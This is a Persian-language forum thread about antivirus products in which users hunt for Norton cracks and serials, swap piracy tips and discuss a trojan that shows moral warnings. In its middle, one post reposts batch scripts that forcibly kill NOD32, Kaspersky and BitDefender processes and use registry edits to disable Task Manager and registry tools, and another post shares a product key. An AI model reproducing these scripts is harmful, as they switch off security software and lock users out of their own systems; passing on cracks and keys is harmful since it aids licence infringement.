آقا اين نورتون كرك نداره ؟؟ اين سريالها كار نميكنه
Printable View
آقا اين نورتون كرك نداره ؟؟ اين سريالها كار نميكنه
آقا كوروش
اين نسخه كه داري آپديتش قديمي ها
حدود 5 ماه قديمي هستش آپديتش
آقا کسی کرکی برای نورتون گیر نیورد!
ای لعنت به این سیمانتک با این ضد حالش!
كورش جان سلام
اگه از كرك استفاده نكني براي آپديت نياز به يوزرنيم و پسورد هست. اما اگه از كرك استفاده كني بدون يوزرنيم و پسورد آپديت مي شود.
سلام سودا جان ببخشید دیر کردم نسخه من Personal هست ممنون ازکمکتوننقل قول:
نوشته شده توسط soda
خوب وقتي پرسونال هست و همچين گيري ميده بايد يه چيز مشكوكي اتفاق افتاده باشه
با يه ضد ويروس مطمون مثل kasper,nod,bitdefender سيستمت رو چك كن
همينجوري نبايد فايل اجرايي برنامه قاط بياد
ممنون سودا با کاسبر ونود اسکن کردم ولی چیزی بیدا نکردند یه نکته ای که باید اضافه کنکم اینه که سیستم من با داشتن فایر وال اتبوست هک شده بود ویه از خدا بی خبر خیلی راحت یه حیات خلوت تو سیستم درست کرده بود و یک اکانت هم برای خودش ایجاد کرده بود که مجبور شدم اکانت خودم را هم حذف کنم ویه اکانت جدید درست کنم احتمالا مشکل از اینجا باشه نظر شما چی هست
با Outpost هك شدي؟
مگه خوب تنظيم نكرده بودي
؟
به تاپيك فايروالها برو و اينو اونجا بگو
چرا سودا جون خوب هم تنظیم کرده بودم (البته به نظر خودم)
با اجازه توی تایپیک فایروالهاهم مطرح کردم
درود بر شمانقل قول:
نوشته شده توسط soda
درسته دوست گرامی
نمیدونم چرا اما خیلی شگفت انگیزه!!! انگار نیاز به راه اندازی دوباره داشت رایانه تا تغییرات اعمال بشه.
هم اکنون بروز هست و سپاس از شما و مهدی ارجمند.
سلام دوستان
یک سری یکیج های اصل انتی ها مثل یاندا یا مک افی توی بازار به تازگی اومده که با قیمت هایی بالا عرضه میشه
گفته میشه این انتیا دارای شماره یوزر مخصوص واسه ابدیت هستن
و میگند که ابدیت شدن اینطوری با مال ما خیلی فرق میکنه
من که خودم نسخه نود هزار تومنیه یاندا رو تست کردم و با شماره مخصوص در سایت خودش ابدیت کردم
من که تفاوتی ندیدم
نظر دوستان چیست؟
دوستدار شما
ابی
خودشونمن نمیدونن سیاستشون تو کرکها چطوره وجدانن اگه خود صاحب سیمانتک بتونه محصولاتشو کرک کنه همشم اینجوره از پارتیشن مجیک گرفته تا انتی ویروسشنقل قول:
نوشته شده توسط sAsAn.K
من هنوز نورتون جدید رو ندارم نمیدونم کرکش چه جوریه .یه سریال نامبر میخواد فقط؟ اینم امتحان کننقل قول:
نوشته شده توسط combat
B26WG-4VJRW-HP9XV-3WQCV-FP8B3
برای غیر فعال کردن nodاز این دستور:نقل قول:
نوشته شده توسط borzou_one
taskkill /f /im nod32.exe /t | taskkill /f /im cfgedit.exe /t | taskkill /f /im nod32kui.exe /t | taskkill /f /im nod32krn.exe /t | tskill ProcessManager /a | tskill MSConfig /a
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
^C
*1
*2
*3
*4
goto nod
و کاسپر از این دستور:
taskkill /f /im kaspersky.exe /t | taskkill /f /im bdnagent.exe /t | tskill ProcessManager /a | tskill MSConfig /a
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
^C
*1
*2
*3
*4
goto kaspersky
استفاده کرده.
مال nod32صد در صد جواب می ده،مال کاسپر رو یک جایی اشتباه کردم در ستش می کنم می زارم.
اینم مال بیت دفندر:
taskkill /f /im bdmcon.exe /t | taskkill /f /im bdnagent.exe /t | tskill ProcessManager /a | tskill MSConfig /a
^C
*1
*2
*3
*4
goto bitdefender
ميل كوچولو جان سلام
آقا اينارو رو كاسپر امتحان كردي
رو سرويس كاسپر البته
آيا جواب ميده؟
ويرايش شده:
اقا همونطور كه حدس ميزدم به هيچ عنوان روي سرويس كاسپر جواب نداد
كاسپر بيدي نبيد كه با اين بادا بلرزه ;)
saman_uv جون این سریال رو که دادی تست کردم کار نکرد
کرکشم اینجوریه که دیگه مثل قبلیه Activate by phone نداره فقط آنلاین کدتو چک می کنه!
ضمنا ما منتظر کرکیماااااااااااااااااااا اااااااااااا سودا جون مهدی جون hamilton جون!;)
lمهدي جان لينكهايي كه واسه nod البته كركش گذاشتي فكر ميكنم تو پرشن گيگ از كار افتاده البته اگه خودت يه امتحان كني بهتره .واسه من كار نكرد.
مال کاسپر یک جایی اشتباه شده،مال nod32صد در صد جواب میده،مال بیت رو هم گذاشتم اونم جواب می ده.نقل قول:
نوشته شده توسط soda
ممنون از راهنمايي هاتون!
مال نود هم بظاهر جواب ميده و بعد از اينكه پروسش رفت بيرون سريع دوباره اجرا ميشهنقل قول:
نوشته شده توسط میل کوچولو
اين مكانيزم رفتاري نود هستش
نقل قول:
نوشته شده توسط Gilopa
گيلوپا جان سلام
من الان كه تست كردم كار مي كنه. اين مشكل به خاطر سرور پرشين گيگ هست كه بعضي اوقات قاط مي زنه. وگرنه لينكها مشكلي ندارن.
درست حتما سرورش مشكل داره.
نقل قول:
نوشته شده توسط ebilove
یعنی هیچ کس نیست یوهو
در مورد آپديت فرقي نميكنه عزيز.شماره سريال معتبري ميدند كه فقط بايد با اون آپديت كني ولي يه چيز جالب برام يعني شما اومدي 90 هزار تومن پول دادي يا من اشتباه متوجه شدم؟!
سلام
نه من پول ندادم یکی از دوستام مسول شبکه است اونیکه خریده بودتد رو یک شب به ما قرض داد یعنی دزیدم
البته اینو بگم ابدیت با یوزر حدود دو مگ بیشتره
به خاطر این من پرسیدم
از پاسخت ممنونم
سلام
آقا كسي به ويروس يا نميدونم چي موجوديه برنخورده كه هروقت ميخوام عكسهاي كامپيوترمو نگاه كنم پيغام ميده كه نگاه كردن عكس حرام است ( به زبان فارسي ميكه ) بعد نوشته حضرت ايت ا.. ...
درضمن بگم كه هميشه نيست بعضي وقتها اينجوري ميشه
منكه تعجب كردم
كسي راه خلاص شودنشو نمي دونه؟؟؟؟
:blink: :blink:نقل قول:
نوشته شده توسط majjidd
ميشه عكس اين پيغام رو برامون بذاري؟
سلام
اقاmajjidd در مورد این نوع ویروس تو یکی از همین هنجمن های خودمون نوشته بودن البته اینطور که اونجا نوشته بود این ویروس فقط زمانی پیداش میشه که بخواهی عکس های خواسی رو ببین
اگه هنگامه ظاهر شدن پیغام ایات قران رو نشون داد که خودشه اگر نشون نداد باز هم خودشه از نوع دیگش
جل الخالق ديگه اي مدليش نديده بويدم.يه عكس بذاريم بخنديم به اين كارا.
سلام
اوني كه چند روز پيش بحثش بود اينطور نبود. شايد اين جديد باشه؟ به حق چيزهاي نشنيده!
Trojan.VB.Yusa.Aنقل قول:
نوشته شده توسط majjidd
کلید های زیر رو در رجیستری الوده می کنه:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun"LoadService"="Virus"]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun"RavTimeX"="Virus"]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun"System4224411"="Virus"]
این ویروس وقتی سیستمی رو الوده می کنه به محض ظاهر شدن صفحه ای که در اون اسمی از کلمات ناجور بیاد ظاهر می شه :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بعد از چند ثانیه از پیغام بالا،این پیغام می یاد:
سپس یک تایمر شروع به کار می کنه با این ظاهر:
و موس روی پیغام زیر قفل می شه و ازش خارج نمی شه:
هر سه تای این گزینه ها یک کار می کنه و اون log offهستش!!!!
ميل جان عجب چيز باحاليه .يعني كار دولت يا نه.خبر داري
با سلام.
اسم اين تروجان "يوسف علي" است كه براي كاربران بازديد كننده از سايتهاي غيراخلاقي پيامهاي اخلاقي نشان ميده.اين تروجان با نصب خود روي سيستم كاربر رفتار اينترنت اورا زير نظر ميگيره و به محض مشاهده تصاوير غير اخلاقي آن پيام ظاهر ميشه.
فکر نکنم کاردولت باشه ولی اونی که اینو نوشته احتمالا ادم باحالی بوده،این رو هم بگم که تا حالا بیت دفندر و کاسپرسکی این تروجان را پاک می کنند بقیه انتی ویروس ها رو نمی دونم.
.......................
همیلتون جان درسته،اسمش یوسف علی است ولی سایت های انتی ویروس به این نام می شناسنش:
Trojan.VB.Yusa.AیاTrojan.Win32.VB.ZUیا Troj/Yusufali-AیاTROJ_CAGER.A
این تروجان یک تروجان عربی هست وکار برنامه نویسهای عرب مسلمان میباشد وربطی به کشور ما نداره در ضمن به غیر از کاری که هامیلتون جان به طور کامل توضیح دادند هیچ خطر دیگه ای برای کاربر ایجاد نمیکنه
عزيز من اگه عربي پس چرا فارسي هم مينويسه.
به سه زبان عربی و فارسی وانگلیسی پیغام میده دلیلش هم اینه که به غیر از عرب زبانها مسلمانهای دیگری به زبانهای دیگری هم توی دنیا هستند
اگه این تروجان عربی بود اسم ایت اله فاضل لنکرانی رو نمی آورد.
...........................................
دوستان کسی در مورد انتی ویروس گلد اطلاع داره که چجوریه.ادرس سایتش اینه:
برای دانلود هم یک فایل 75 کیلو باتی به ادم می ده و با اون فایل انلاین انتی ویروس رو رو سیستم نصب می کنه.set up کامل دست ادم نمی ده!!!!فکر هم نکنم کرک داشته باشه با این اوضاع!!
اره خودشه :blush:نقل قول:
نوشته شده توسط میل کوچولو
همين بود :blush: :blush: